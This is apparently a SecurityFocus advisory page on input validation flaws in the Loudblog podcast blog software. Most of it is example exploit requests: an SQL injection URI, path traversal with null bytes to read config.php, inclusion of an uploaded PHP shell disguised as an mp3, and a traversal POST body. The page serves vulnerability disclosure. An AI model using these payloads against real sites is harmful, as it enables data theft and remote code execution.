Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Loudblog Multiple Input Validation Vulnerabilities

These issues could be exploited with a web client.

The following examples demonstrate exploiting these issues:

Example URIs:
http://www.example.com/loudblog/podcast.php?id=[SQL]
http://www.example.com/loudblog/index.php?template=../../../loudblog/custom/config.php%00
http://www.example.com/loudblog/loudblog/index.php?page=/../../../audio/cmdphp.mp3%00

Example POST data:
POST /loudblog/loudblog/inc/backend_settings.php HTTP/1.1
Host: www.example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

language=../../../index







 

Privacy Statement
Copyright 2009, SecurityFocus